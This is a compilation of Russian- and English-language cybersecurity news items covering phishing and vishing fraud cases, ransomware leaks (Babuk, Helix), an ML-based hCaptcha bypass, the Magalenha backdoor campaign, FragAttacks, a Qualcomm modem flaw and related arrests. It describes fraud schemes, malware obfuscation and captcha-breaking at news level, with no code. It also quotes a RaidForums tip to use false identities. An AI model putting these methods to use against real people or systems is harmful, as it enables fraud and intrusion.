Посредники сообщали пользователям торговой площадки ложную информацию о необходимости перейти по ссылке для оформления доставки. Вид ссылки у потерпевших никаких подозрений не вызвал: там было указано название торговой площадки, окно также визуально соответствовало стилю оформления данной площадки. В действительности же это была заранее сгенерированная фишинговая ссылка, которая вела на специально созданный обвиняемыми сетевой ресурс. Там потерпевшие вводили реквизиты своих банковских платежных карт. После этого денежные средства переводились злоумышленниками на другую банковскую платежную карту, часть денежных средств оставалась обвиняемым, часть получали «воркеры».
Всего обвиняемые похитили более 23 тысяч рублей у 76 потерпевших, еще почти 20 тысяч рублей они пытались похитить у 43 граждан.
По уголовному делу выполнен значительный объем следственных действий. Проведены допросы более 400 лиц в качестве потерпевших и свидетелей, осмотрено и проанализировано более 100 документов и иных носителей информации, проведены иные трудоемкие следственные и процессуальные действия.
Действия обвиняемых квалифицированы по ч. 1 ст. 14, ч. 4 ст. 212 (покушение на хищение имущества путем модификации компьютерной информации, совершенное в особо крупном размере, группой лиц) Уголовного кодекса Республики Беларусь. Оба брата – уроженцы Крупского района, проживающие в столице, ранее к уголовной ответственности не привлекались.
Благодаря профессионализму следователей причиненный гражданам имущественный вред возмещен в полном объеме еще в ходе досудебного производства. Приговором суда Ленинского района города Минска обвиняемые признаны виновными в совершении инкриминируемого им преступления, каждому из них назначено наказание в виде лишения свободы сроком на 5 лет с отсрочкой исполнения наказания на срок 3 года со штрафом в размере 500 базовых величин.
• Source: sk.gov.by/ru/news-usk-minsk-ru/view/nado-eto-na-21-janvarja- postavlena-tochka-v-ugolovnom-dele-o-krupnom-kiberprestuplenii- sovershennom-10854/
В Киберполицию поступили многочисленные жалобы от потерпевших о том, что некий интернет-магазин систематически совершает мошеннические действия, связанные с невыполнением обязательств перед клиентами и несоблюдением прав потребителей. Среди прочего – он предоставляет возможность покупки товаров в кредит, после чего не отправляет им заказы и не возвращает деньги.
По факту многочисленных жалоб на интернет-магазин было возбуждено уголовное расследование по ч. 3 ст. 190 Уголовного Кодекса (мошенничество). Проведя собственное расследование, мы выяснили, что данный магазин является партнером маркетплейса Epicentrk.ua и прайс-агрегатора Hotline.ua. Тем не менее, недобросовестное отношение к клиентам, довело его до уголовной статьи.
Один из потерпевших, упомянутых в материалах расследования, нашел на сайте TopRadar.com.ua интересующие его материнские платы, и решил приобрести 4 штуки, общей стоимостью 13,680 грн. Покупку он оформил в кредит от Приватбанка (оплата частями) на 5 платежей за 4 месяца (по 2,736 грн). В качестве доставки он выбрал Новую Почту, но так и не получил номер накладной.
Спустя пару дней, покупатель позвонил по телефону, указанному на сайте, где его заверили, что отправят товар как можно скорее, но после этого телефоны перестали отвечать. Обратившись в Приватбанк, потерпевший заявил, что стал жертвой мошенников и попросил разорвать кредитный договор. Однако ему отказали, предложив самостоятельно решать вопрос с ФОПом, которому принадлежит данный магазин.
Еще один потерпевший оформил в кредит товар стоимостью 16 тыс. грн. На протяжении 3 месяцев его кормили завтраками, обещая отправить товар, а после – вернуть деньги. В конечном счете – ни товара, ни денег он так и не получил.
Подобных отзывов о работе магазина можно найти огромное количество на сайте Hotline.ua, где размещаются их товарные позиции.
Среди наиболее частых жалоб – отсутствие товара на складе и слишком долгий срок ожидания отправки (иногда она так и не наступает), проблемы с возвратом денег в случае возврата товара; несоответствие товара описанию на сайте, следы того, что товар был в употреблении, предоплата за товар, которого нет на складе.
Помимо этого, торговец, который, судя по всему, является одновременно хозяином магазина и менеджером, который общается с покупателями, не гнушается грубить недовольным клиентам.
Многие потерпевшие сообщают, что добиться возврата денег им удалось только после подачи заявления в Киберполицию.
В результате этих жалоб, сотрудники следственного отдела Нацполиции Обухова, решением суда, в рамках возбужденного уголовного расследования по статье 190 УКУ, изъяли у подозреваемого владельца магазина компьютерную технику, мобильные телефоны, банковские карты и сим-карты мобильных операторов, которые должны помочь установить: являлась ли его недобросовестность умышленной и сколько еще людей могло пострадать от мошеннических действий интернет- предпринимателя.
У федеральных агентств есть 60 дней на пересмотр и обновление своих внутренних программ кибербезопасности.
Агентство по кибербезопасности и безопасности инфраструктуры (CISA) США выпустило первую в нынешнем году обязательную операционную директиву (binding operational directive, BOD), предписывающую федеральным гражданским агентствам в жесткие сроки исправить уязвимости, используемые киберпреступниками в ходе атак.
Новая директива BOD 22-01 Reducing the Significant Risk of Known Exploited Vulnerabilities («Снижение значительного риска известных эксплуатируемых уязвимостей») распространяется как на программное обеспечение, так и на оборудование в федеральных информационных системах с и без выхода в интернет, включая те, которые управляются федеральными агентствами или третьими сторонами от имени агентства.
«Это большой шаг вперед в защите федеральных гражданских сетей. Обязательная операционная директива (BOD) 22-01 устанавливает временные рамки для устранения известных эксплуатируемых уязвимостей», — сообщила директор CISA Джен Истерли (Jen Easterly).
CISA опубликовало [список](https://www.cisa.gov/known-exploited- vulnerabilities-catalog) сотен эксплуатируемых уязвимостей, которые подвергают государственные системы значительным рискам атак в случае их успешного использования злоумышленниками.
В настоящее время список включает 200 уязвимостей, выявленных в период с 2017 года по 2020 год, и 90 уязвимостей, обнаруженных в 2021 году. CISA регулярно обновляет список новыми обнаруженными уязвимостями, если они соответствуют следующим условиям:
-Уязвимости присвоен идентификатор Common Vulnerabilities and Exposures (CVE).
-Есть достоверные доказательства эксплуатации в ходе кибератак.
-Существует четкое действие по исправлению уязвимости, например обновление, предоставленное поставщиком.
CISA приказало федеральным агентствам пересмотреть и обновить свои внутренние программы кибербезопасности в течение 60 дней с момента публикации директивы. Агентства также должны будут предоставлять ежеквартальные отчеты о статусе исправлений уязвимостей через порталы CyberScope или CDM Federal Dashboard.
Задержаны члены преступной группы, похитившие со счета минчанки крупную сумму. Об этом в своем Telegram-канале проинформировала пресс-секретарь МВД Ольга Чемоданова.
На злоумышленников, которые занимались вишингом, вышли оперативники управления "К" МВД. Подельников задерживали одновременно в различных районах столицы. Мошенники действовали по уже традиционной схеме: под видом банковских работников позвонили женщине в Viber и якобы для защиты ее счета выведали коды из поступивших ей СМС-сообщений. Конфиденциальные цифры являлись сеансовыми паролями для доступа к счету. С их помощью молодые люди вывели электронные деньги с депозита на подставные карт-счета и обналичили в разных банкоматах Минска. Всего потерпевшая лишилась более $110 тыс.
Следователи дали правовую оценку действиям задержанных и возбудили уголовное дело за хищение путем использования компьютерной техники.
Публикацию личных данных сотрудников полицейского управления Вашингтона начали хакеры из группы Babuk.
Ранее хакеры сooбщали о похищении более 250 гигабайт личных данных с официального сайта полицейского управления столицы США. Злоумышленники отметили, что размер выкупа, предложенный правоохранителями, их не устроил. В Babuk заявляют, что если полиция не увеличит сумму выкупа, группа опубликует все имеющиеся данные о сотрудниках управления.
"Переговоры зашли в тупик, сумма, которую нам предложили, нас не устраивает, мы размещаем еще 20 личных файлов на офицеров, вы можете скачать этот архив, парoль будет выпущен завтра”, — написала во вторник хакерская группа Babuk, сообщает издание Vice Motherboard. — Если в течение завтрашнего дня они не поднимут цену, мы опубликуем все данные”.
Опубликованные фaйлы представляют собой биографии силовиков. Они содержaт информацию о состоянии здоровья, уголовном прошлом и кредитной репутации кандидатов в полицейские, списки их прошлых aдресов, номера телефонов и социального страхования, копии водительских удостоверений, а также имена возможных родственников.
В марте 2021 года исследователи из Университета Луизианы в Лафайете представили доклад об атаках на hCaptcha, которая в прошлом году заменила reCAPTCHA в Cloudflare и Google.
Эксперты разработали атаку, которая использует инструменты автоматизации браузера, распознавание изображений, классификаторы изображений, а также алгоритмы машинного обучения для скачивания задач hCaptcha, распознавания содержимого изображений, классифицикации изображений и последующего решения задач.
Более того, в отличие от других атак на различные системы CAPTCHA, этот метод не требует большие вычислительных мощностей: оборудование исследователей состояло из простого контейнера Docker под управлением Ubuntu, с трехъядерным процессором и 2 Гб памяти.

Ученые пишут, что их атака работает с точностью 95,93%, и в среднем на взлом hCaptcha уходит всего 18,76 секунды. Причем атака могла бы сработать еще быстрее, если бы исследователи заменили собственный классификатор изображений на такие сервисы, как Google Cloud Vision, Amazon Rekognition и Microsoft Azure Cognitive Vision.

Авторы доклада предупредили, разработанный ими метод может помочь злоумышленникам обойти hCaptcha на действующих сайтах и выполнять автоматизированные атаки, включая публикацию спама на форумах, скраппинг контента и так далее.
Журналисты издания The Record обратились за комментарием к компании Cloudflare, так как выводы, сделанные специалистами Университета Луизианы, встревожили многих владельцев сайтов. В компании заявили, что «hCaptcha — это лишь один из различных методов, которые Cloudflare использует для обнаружения и возможной блокировки автоматизированного трафика». Представители Cloudflare уверяют, что у них есть дополнительные системы для обнаружения автоматических атак, и тревожиться о новом методе атак не стоит.
Разработчики hCaptcha, в свою очередь, сообщили, что они уже внедрили в свою CAPTCHA предложенные экспертами методы для смягчения последствий от подобных атак. Вместе с тем в hCaptcha признали, что бесплатная версия не предотвращает все виды автоматизированных атак, но исключительно в силу некоторых проектных решений.
«Наша система не должна сливать обнаружения в режиме реального времени. В отличие от reCAPTCHA, где вы можете просто войти в систему и получить отметку бота, что делает ее тривиальной для взлома.
Это ограничивает возможности протестированной [исследователями] бесплатной версии, которая спроектирована таким образом, чтобы не полностью предотвращать работу всей обнаруженной автоматизации, если та дает правильные ответы.
Вместо этого один из инструментов, на который полагается hCaptcha, часто меняет классы и типы задач. Причем он также имеет защиту от слива, чтобы избежать утечки.
Таким образом, после ознакомления с документом мы ответили им, что на самом деле защита от сливов работала, как и было задумано», — говорят разработчики hCaptcha.Click to expand...
Источник: xakep.ru/2021/04/07/hcaptcha/
Сотрудники Федеральной службы безопасности и Министерства цифрового развития обсуждают вопрос ужесточения продажи сим-карт россиянам. Как стало известно вариантов несколько: обязательная биометрия при покупке, продажа только в салонах операторов связи, отделениях МФЦ и «Почты России», а также использование цифровой подписи в приложении «Госключ».
«Ужесточение порядка продаж гражданам РФ логично, потому что после ограничений в отношении мигрантов серые подключения могут "перетечь" в другие, менее зарегулированные сегменты рынка», — рассказал «Коммерсанту» источник, близкий к операторам связи.
Click to expand...
При этом в «Мегафоне» журналистам подтвердили, что вопрос находится в активной фазе рассмотрения. Дискуссию с регулятором на тему правил продажи сим-карт там назвали достаточно интенсивной.
«Изменения в законодательстве назрели, однако сформированной инициативы с конкретными правилами продажи сим-карт на сегодня еще нет», — констатировали представители компании.
Click to expand...
Опрошенные изданием отраслевые эксперты согласились, что изменение порядка продажи сим-карт окажет влияние и на самих операторов, и на белые рынки, и на серые. Вместе с тем никто из них не ждет радикальных перемен, в том числе в вопросе незаконного оборота сим-карт.
source: kommersant.ru/doc/6692817
Сотрудники правоохранительных органов задержали руководителя букмекерской компании Игоря Ляпустина по подозрению в мошенничестве. Суд рассмотрит ходатайство о его аресте.
Глава букмекерской компании «Мелбет» Игорь Ляпустин задержан сотрудниками правоохранительных органов, рассказали РБК два источника, близких к МВД. Собеседники РБК называют его одним из ключевых персонажей на рынке букмекерских компаний.
Следствие уже ходатайствовало об аресте Ляпустина. Как подтвердили РБК в Тверском районном суде Москвы, к ним поступил материал об избрании меры пресечения в виде заключения под стражу. Букмекеру вменяется мошенничество, совершенное организованной группой либо в особо крупном размере (ч. 4 ст. 159 УК). Максимальное наказание по этой статье Уголовного кодекса составляет до десяти лет лишения свободы.
По данным СПАРК, Ляпустин — генеральный директор компании «Мелофон». Основной вид ее деятельности — организация и проведение азартных игр и заключение пари. Бенефициаром компании, зарегистрированной в 2012 году, выступает Мария Кеббул. «Мелофон» владеет доменом melbet.ru, а также несколькими торговыми марками — melbet mel mel bet, toto melbet, voltbet, «азарт в твоем сердце».
Букмекер «Мелбет» в прошлом году занимал девятое место в рейтинге российских букмекерских компаний, составленном аналитической группой «РБК Исследования рынков». В то же время чистая прибыль ООО «Мелофон» составляла 3,9 млрд руб.
«Мелбет» — титульный партнер ФНЛ (Первой лиги по футболу, второго по значимости российского футбольного дивизиона).
Кроме того, Ляпустин также руководит компанией «Твоя ставка», которое занимается деятельностью по заключению пари с 2022 года, ей также принадлежит тотализатор «Мелбет».
sc: rbc.ru/politics/04/04/2024/660e72729a79477300d5a53f?from=from_main_1
Российская медицинская лаборатория Helix подверглась «серьезной» кибератаке,
из-за которой клиенты несколько дней не могли получить результаты своих
анализов.
В заявлении, опубликованном в Telegram в понедельник, сообщается, что хакеры
попытались заразить системы компании вымогательским ПО. По словам
представителей Helix, их техническая команда частично восстановила
работоспособность веб-сайта, мобильного приложения и других электронных
медицинских сервисов без выкупа.
Helix уверяет, что во время хакерской атаки не было утечки персональных данных
клиентов. Однако, из-за сбоев в работе сервиса лаборатория не смогла вовремя
передать результаты медицинских тестов всем.
Некоторые получили результаты уже во вторник, однако многие жалуются на долгое
ожидание в официальном телеграм-канале и требуют возврата денег. Кому-то
анализы были срочно необходимы для госпитализации или выявления COVID-19.
Для предотвращения подобных кибератак в будущем Helix сбросила все пароли
клиентов и усилила свои протоколы защиты. Александр Луганский, руководитель
отдела информационной безопасности лаборатории, заявил, что решение о
привлечении правоохранительных органов будет принято на основе результатов
внутреннего расследования.
Cегодня на одном из хакерском форуме в даркнете был выложен дамб базы клиентов
компании, содержащий 7.3 млн строк, в т.ч. ФИО, дата рождения, почта, телефон,
Снилс и другая персональная информация. Хакер угрожает выложить более
чувствительную информацию в ближайшее время.
Ранее, в мае, группа хакеров заявила о краже 14 терабайт данных у российской
медицинской лаборатории СИТИЛАБ. Были опубликованы персональные данные около
500 тыс. человек, включая имена, даты рождения, телефонные номера и
электронные адреса, якобы в качестве предупреждения для компании.
Бразильская хакерская группа атакует португальские государственные и частные финансовые учреждения, в том числе крупные банки, в рамках злонамеренной кампании под названием «Операция Магалена» («Operation Magalenha»), которая продолжается с 2021 года. Последняя волна операции направлена на португальскую энергетическую компанию «Energias de Portugal» и налоговую службу «Portuguese Tax and Customs Authority».
Для заражения своих целей кибербандиты применяют длинную цепочку действий, включающую фишинговые письма, социальную инженерию, а также перенаправление жертв на поддельные сайты.
О новой волне операции сообщила компания Sentinel Labs в своём [отчёте](https://www.sentinelone.com/labs/operation-magalenha-long-running- campaign-pursues-portuguese-credentials-and-pii/) , в котором раскрыла инструменты и методы распространения вредоносного ПО, используемые злоумышленниками.
Происхождение и тактику хакеров специалистам удалось выявить благодаря ошибке в настройке используемого злоумышленниками сервера. Исследователи смогли получить доступ к файлам, директориям, внутренней переписке и другим данным преступников.
Во всех случаях заражение начинается с фишинговых писем, содержащих обфусцированный сценарий VBScript, который при запуске загружает и активирует загрузчик вредоносного ПО, в свою очередь устанавливающий на систему жертвы сразу две версии бэкдора «PeepingTitle».
«Сценарии VBScript обфусцированы таким образом, что злонамеренный код разбросан среди большого количества комментариев к коду, которые обычно являются скопированным содержимым публично доступных репозиториев. Это простая, но эффективная техника для обхода статических механизмов обнаружения», — объяснили аналитики в отчёте.
Исследователи также добавили, что главная задача VBScript-сценария в рассмотренной кампании — отвлечь пользователей во время загрузки вредоносного ПО, перенаправить их на поддельные порталы целевых учреждений, а затем собрать там их учётные данные.
Проанализированный специалистами экземпляр бэкдора PeepingTitle, о котором упоминалось выше, написан на Delphi и скомпилирован в апреле этого года. Sentinel Labs полагает, что он был разработан одним человеком или небольшой командой.
Причина того, почему хакеры устанавливают сразу две версии бэкдора в системе жертвы, заключается в том, что один из бэкдоров используется для захвата экрана заражённой системы, а другой — для мониторинга окон и отслеживания взаимодействия пользователя с ними. Кроме того, второй бэкдор может загружать дополнительные вредоносные нагрузки.
Вредоносное ПО постоянно сканирует запущенные сайты на целевом компьютере, а когда находит там один из необходимых злоумышленникам, начинает записывать все отображаемые и вводимые там данные, чтобы затем отправить на C2-сервер хакеров.
PeepingTitle также может делать скриншоты экрана, завершать процессы, изменять свою конфигурацию интервала мониторинга и запускать полезные нагрузки из исполняемых или DLL-файлов.
Sentinel Labs отмечает несколько случаев, когда бразильские злоумышленники демонстрировали способность адаптироваться и оперативно преодолевать некоторые технические проблемы. Так, в середине 2022 года группировка перестала использовать DigitalOcean Spaces для хостинга и распространения вредоносного ПО, сменив его на ряд других, менее известных облачных провайдеров. Аналитики полагают, что это было связано с тем, что DigitalOcean слишком часто препятствовал работе хакеров и создавал им трудности.
Разработчики ПО не согласны с выводами SFC.
Software Freedom Conservancy , некоммерческая организация, которая
предоставляет поддержку и юридические услуги для проектов программного
обеспечения с открытым исходным кодом, призвала сообщество открытого исходного
кода отказаться от GitHub после выхода из самой платформы для размещения кода
и совместной работы.
Заявление было сделано через неделю после того, как GitHub, принадлежащий Microsoft, запустил коммерческую версию Copilot, — ИИ инструмента, совместно разработанного GitHub и OpenAI для помощи пользователям таких интегрированных сред разработки как Visual Studio Code, Visual Studio, Neovim и JetBrains в авто дополнении кода.
Software Freedom Conservancy финансируется рядом известных компаний, таких как Google, Red Hat и Mozilla, и ее члены охватывают более 40 проектов , включая Git (на который в значительной степени опирается GitHub), Selenium и Godot .
Основная претензия – в доминирующем положении GitHub, а также в проекте
Copilot – поначалу бесплатном виртуальном помощнике программиста, обученном на
чужом открытом коде, который GitHub теперь продает за деньги.
SFC сама отказалась от использования GitHub для размещения своих проектов с
открытым кодом. Представители компании аргументировали это тем, что в
последние годы GitHub стал играть доминирующую роль в разработке бесплатного
Open Source ПО.
GitHub Copilot работает по подписке — $10 в месяц или $100 в год, объявила компания неделю назад. Бесплатная версия будет доступна студентам с пакетом GitHub Student Developer Pack и разработчикам популярных проектов с открытым исходным кодом на GitHub.
Microsoft и OpenAI представили GitHub Copilot в июне 2021 года. Это ИИ-сервис, который работает как «напарник» программиста — просматривает существующий код, комментарии к нему и расположение курсора, а затем предлагает добавить одну или несколько строк в зависимости от контекста.
Проблема SFC с GitHub связана с обвинениями в том, что Microsoft и OpenAI
обучили систему ИИ под названием Copilot на данных, которые были опубликованы
под лицензией с открытым исходным кодом.
Copilot поднимает ряд важных вопросов о том, кто на самом деле является
автором программного обеспечения. «Открытый исходный код» не означает полную
бесплатность для всех, и по-прежнему необходимо выполнять лицензионные
требования и указывать авторство, поэтому, если Copilot «заимствует» код из
одного проекта и предлагает его автору другого проекта, является ли это
нарушением авторских прав?
Открытый исходный код не похож на ящик для пожертвований, где вы можете просто
взять все, что хотите, и использовать его так, как пожелаете.
В 2021 году Фонд свободного программного обеспечения (FSF) объявил о
проведении исследований этических и законных вопросов работы Copilot. При этом
специалисты инженерной школы Тандона Нью-Йоркского университета выяснили, что
инструмент примерно в 40% случаев генерирует код с ошибками или уязвимостями.
Теперь Software Freedom Conservancy прекращает внутреннее использование GitHub и внедряет программу, помогающую проектам-членам отказаться от платформы. Кроме того, организация не будет принимать новых участников, у которых нет чёткого плана по переносу своих проектов с открытым исходным кодом с GitHub.
Однако разработчики ПО не согласны с выводами SFC. Copilot - хит. Сообществу разработчиков нравится использовать детище Microisoft. Copilot получил больше положительных отзывов, а аргументы противников недостаточно убедительны.
Проиндексированное Google сообщение содержит «советы по обеспечению безопасности учетной записи» сотрудникам.
Внутренние страницы подпольной торговой площадки RaidForums, предназначенные
только для сотрудников, случайно оказались в общем доступе.
На RaidForums раздел Staff General обычно предназначен только для внутренних
сотрудников, но по иронии судьбы этот закрытый раздел был случайно оставлен
открытым для просмотра любым пользователем.
По данным BleepingComputer, некоторые частные страницы были проиндексированы
Google.
Проиндексированное сообщение содержит «советы по обеспечению безопасности
учетной записи» для администраторов и модераторов форума. В заметке содержатся
советы по использованию менеджеров паролей, включению двухфакторной
аутентификации для учетной записи и использованию VPN.
«Создайте ложную личность, используйте ее при подписке на сервисы, которые
запрашивают эту информацию, или даже просто используйте информацию
знаменитостей или случайных людей», — говорится в заметке, опубликованной
администратором RaidForums.
Другие темы, которые можно было увидеть в личном кабинете, включали обсуждения
запретов, предпочтительное место для размещения чата с персоналом и разные
запросы.

[ Phorpiex botnet shuts down, source code goes up for sale
](https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up- for-sale/amp/)
The operators of the Phorpiex malware have shut down their botnet and put its source code for sale on a dark web cybercrime forum, The Record has learned.
 therecord.media
Click to expand...
Good luck finding!
Newly discovered Wi-Fi security vulnerabilities collectively known as FragAttacks(fragmentation and aggregation attacks) are impacting all Wi-Fi devices (including computers, smartphones, and smart devices) going back as far as 1997.
Three of these bugs are Wi-Fi 802.11 standard design flaws in the frame
aggregation and frame fragmentation functionalities affecting most devices,
while others are programing mistakes in Wi-Fi products."Experiments indicate
that every Wi-Fi product is affected by at least one vulnerability and that
most products are affected by several vulnerabilities," security researcher
Mathy Vanhoef (New York University Abu Dhabi), who discovered the FragAttacks
bugs, said.
"The discovered vulnerabilities affect all modern security protocols of Wi-Fi,
including the latest WPA3 specification. Even the original security protocol
of Wi-Fi, called WEP, is affected.
"This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997!," Vanhoef added.
Attackers abusing these design and implementation flaws have to be in the Wi- Fi range of targeted devices to steal sensitive user data and execute malicious code following successful exploitation, potentially leading to full device takeover.
Luckily, as Vanhoef further found, "the design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings."
However, the programming mistakes behind some of the FragAttacks vulnerabilities are trivial to exploit and would allow attackers to abuse unpatched Wi-Fi products with ease.
FragAttacks CVEs associated with Wi-Fi design flaws include:
Wi-Fi implementation vulnerabilities were assigned the following CVEs:
Other implementation flaws discovered by Vanhoef include:
The researcher also made a video demo demonstrating how attackers could take over an unpatched Windows 7 system inside a target's local network.
The Industry Consortium for Advancement of Security on the Internet (ICASI) says
[Cisco Systems](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-wifi-faf-22epcEWu), HPE/Aruba Networks, Juniper Networks, [Sierra Wireless](https://source.sierrawireless.com/resources/security- bulletins/sierra-wireless-technical-bulletin---swi-psa-2021-003), and Microsoft [[1](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2020-24587), [2](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2020-24588), [3](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2020-26144)] have already published FragAttacks security updates and advisories.
These security updates have been prepared during a 9-month-long coordinated disclosure process supervised by ICASI and the Wi-Fi Alliance.
"There is no evidence of the vulnerabilities being used against Wi-Fi users maliciously, and these issues are mitigated through routine device updates that enable detection of suspect transmissions or improve adherence to recommended security implementation practices," the Wi-Fi Alliance said.
"As always, Wi-Fi users should ensure they have installed the latest recommended updates from device manufacturers."
If your device vendor hasn't yet released security updates addressing the FragAttacks bugs, you can still mitigate some of the attacks.
This can be done by ensuring that all websites and online services you visit use Hypertext Transfer Protocol Secure (HTTPS) protocol (by installing the HTTPS Everywhere web browser extension, for instance.)
Additional mitigation advice available on the FragAttacks website suggests "disabling fragmentation, disabling pairwise rekeys, and disabling dynamic fragmentation in Wi-Fi 6 (802.11ax) devices."
FragAttacks technical details are available in Vanhoef's " Fragment and Forge: Breaking Wi-Fi ThroughFrame Aggregation and Fragmentation" research paper.
During the last four years, Vanhoef also discovered the KRACK and Dragonblood attacks allowing attackers to observe the encrypted network traffic exchanged between connected Wi-Fi devices, crack Wi-Fi network passwords, forge web traffic by injecting malicious packets and steal sensitive information.
A high severity security vulnerability found in Qualcomm's Mobile Station Modem (MSM) chips (including the latest 5G-capable versions) could enable attackers to access mobile phone users' text messages, call history, and listen in on their conversations.
[Qualcomm MSM](https://www.qualcomm.com/news/releases/1997/03/03/qualcomm- announces-next-generation-mobile-station-modem) is a series of 2G, 3G, 4G, and 5G capable system on chips (SoCs) used in roughly 40% of mobile phones by multiple vendors, including Samsung, Google, LG, OnePlus, and Xiaomi.
"If exploited, the vulnerability would have allowed an attacker to use Android OS itself as an entry point to inject malicious and invisible code into phones," according to Check Point researchers who found [the vulnerability tracked as CVE-2020-11292](http://research.checkpoint.com/2021/security- probe-of-qualcomm-msm/).
The security flaw could also enable attackers to unlock the subscriber identification module (SIM) used by mobile devices to store network authentication info and contact information securely.
To exploit CVE-2020-11292 and take control of the modem and dynamically patch it from the application processor, attackers have to abuse a heap overflow weakness in the Qualcomm MSM Interface (QMI) interface used by the company's cellular processors to interface with the software stack.
Malicious apps could also use the vulnerability to hide their activity under cover of the modem chip itself, effectively making themselves invisible to security features used by Android to detect malicious activity.
"We ultimately proved a dangerous vulnerability did in fact exist in these chips, revealing how an attacker could use the Android OS itself to inject malicious code into mobile phones, undetected," Yaniv Balmas, Check Point Head of Cyber Research, told bleepingcomputer[.]
"Going forward, our research can hopefully open the door for other security researchers to assist Qualcomm and other vendors to create better and more secure chips, helping us foster better online protection and security for everyone."
Check Point disclosed their findings to Qualcomm in October, who later confirmed their research, rated the security bug as a high severity vulnerability and notified the relevant vendors.
To protect themselves against malware exploiting this or similar security bugs, Check Point advises users to update their devices to the latest released OS versions that usually come with security updates.
Additionally, only installing apps from official app stores should greatly minimize the risk of accidentally installing malicious applications.
More technical details on the CVE-2020-11292 vulnerability are available in the [report](https://research.checkpoint.com/2021/security-probe-of-qualcomm- msm/) published by Check Point today.
After receiving Check Point's report, Qualcomm developed security updates to address the CVE-2020-11292 security issue and made them available to all impacted vendors two months later, in December 2020.
"Providing technologies that support robust security and privacy is a priority for Qualcomm," a Qualcomm spokesperson told bleepingcomputer[.]
"We commend the security researchers from Check Point for using industry- standard coordinated disclosure practices.
"Qualcomm Technologies has already made fixes available to OEMs in December 2020, and we encourage end-users to update their devices as patches become available."
Given that Qualcomm sent CVE-2020-11292 patches to OEMs last year, Android users with newer devices still receiving system and security updates should all be protected against any attempts to compromise their up-to-date devices.
Unfortunately, those who haven't switched to a new device with support for newer Android releases in the last couple of years might not be so lucky.
Just to put things into perspective, roughly 19% of all Android devices are still running Android Pie 9.0 (released in August 2018) and over 9% Android 8.1 Oreo (released in December 2017), according to StatCounter data.
Last year, Qualcomm fixed more vulnerabilities affecting the Snapdragon chip Digital Signal Processor (DSP) chip that allow attackers to take control of smartphones without user interaction, spy on their users, and create unremovable malware capable of evading detection.
KrØØk, a security flaw that can be used to decrypt some WPA2-encrypted wireless network packets, was also fixed by Qualcomm in July 2020.
Another bug that could allow access to critical data and two flaws in the Snapdragon SoC WLAN firmware allowing over the air compromise of the modem and the Android kernel were patched one year earlier, in 2019.
Немецкий ИБ-эксперт Майк Кукетц (Mike Kuketz) заметил, что в приложении LastPass для Android работают семь трекеров, которые наблюдают за пользователями.
Свои выводы исследователь строит на отчете некоммерческой организации Exodus, которая описывается как инициатива «возглавляемая хактивистами, цель которой — помочь людям понять проблемы слежения в Android-приложениях».
В менеджере паролей было найдено семь трекеров, в том числе четыре от Google, собирающих данные в аналитических целях и для отчетов о сбоях, а также от AppsFlyer, MixPanel и Segment. К примеру, последний собирает информацию для маркетинговых команд, а его разработчики пишут, что инструмент предлагает составить «единое представление о клиенте», профилируя пользователей и связывая воедино их действия на разных платформах (предположительно для персонализации рекламы).
Кукетц полагает, что таким образом разработчики LastPass стремятся монетизировать огромное количество бесплатных пользователей своего приложения. При этом исследователь предупреждает, что зачастую разработчики приложений вообще не знают, какие данные собирают трекеры и что передают третьим сторонам. В итоге интеграция в приложение чужого проприетарного кода может быть опасна и может привести к утечке данных. По мнению эксперта, подобным трекерам вообще не место в менеджере паролей, чья безопасность крайне важна.
По данным эксперта, LastPass передает на сторону сведения об используемом устройстве, операторе связи, типе учетной записи LastPass, рекламном идентификаторе Google (который может использоваться для связывания данных о пользователе из разных приложений). Кроме того, трекеры «знают» когда пользователь создает новые пароли и какого они типа.
В итоге Кукетц приходит к выводу, что вместо LastPass лучше использовать другие парольные менеджеры, к примеру, опенсорсный KeePass. Дело в том, что, согласно Exodus, ни в коде KeePass, ни в коде 1Password трекеров нет вовсе. В коде опенсорсного Bitwarden можно обнаружить два «маячка»: аналитический Google Firebase и отчеты о сбоях Microsoft Visual Studio, а в коде Dashlane было найдено четыре.
Представители LastPass уже заверили СМИ, что с помощью обнаруженных трекеров нельзя передавать конфиденциальные данные пользователей, и их хранилище тоже в безопасности. Подчеркивается, что трекеры собирают лишь статистическую информацию об использовании приложения, которая используется для улучшения и оптимизации продукта. К тому же отказаться от сбора аналитики можно в настройках.
Источник: xakep.ru/2021/02/26/lastpass-trackers/
Среди задержанных оказался призрак без прописки и с большими связями.
Нидерландские правоохранительные органы провели серию рейдов и арестовали четырёх человек, подозреваемых в продаже личных данных через группы в Telegram. В ходе операции были изъяты устройства для хранения данных и огнестрельное оружие. Следствие направлено на пресечение незаконного оборота данных, связанного с мошенничеством и кражей личности.
Среди задержанных — 26-летний мужчина и 20-летняя женщина из Леувардена, 28-летний мужчина из Маарссена и 31-летний мужчина без постоянного места жительства. По информации полиции, задержанные продавали персональные данные, включая имена, даты рождения, банковские реквизиты и адреса, полученные в результате взломов или утечек из компаний.
Полиция предупреждает, что подобные данные используются для обмана граждан: злоумышленники часто выдают себя за сотрудников банков или нацеливаются на уязвимых людей, таких как пожилые граждане.
В ходе рейдов сотрудники правоохранительных органов обнаружили три единицы огнестрельного оружия. Следствие продолжается, при этом особое внимание уделяется выявлению источников утечки данных. Полиция также заявила, что возможны новые аресты, так как мониторинг Telegram-групп продолжается.
Для усиления присутствия в Telegram полиция оставляет сообщения в публичных и приватных группах, предупреждая о последствиях незаконной торговли данными. Одно из сообщений гласит: «Возможно, мы уже заметили ваш никнейм — скоро увидимся!».
Эта операция совпала с непростой ситуацией для Telegram после ареста его основателя Павла Дурова во Франции в августе 2024 года. Telegram, известный своим вниманием к конфиденциальности, изменил политику приватности в сентябре, начав предоставлять IP-адреса и телефонные номера пользователей по запросам властей.
Эти изменения вызвали разногласия среди пользователей. Часть аудитории приняла нововведение как шаг в борьбе с серьёзными преступлениями, такими как утечки данных и детская эксплуатация. Однако журналисты, правозащитники и другие пользователи, ценящие анонимность, начали искать более защищённые платформы, опасаясь за свою конфиденциальность.
politie.nl/nieuws/2024/oktober/21/01.-politie-plaatst-waarschuwingsbericht-in- telegram-groepen-na-aanhoudingen-datahandelaren.html
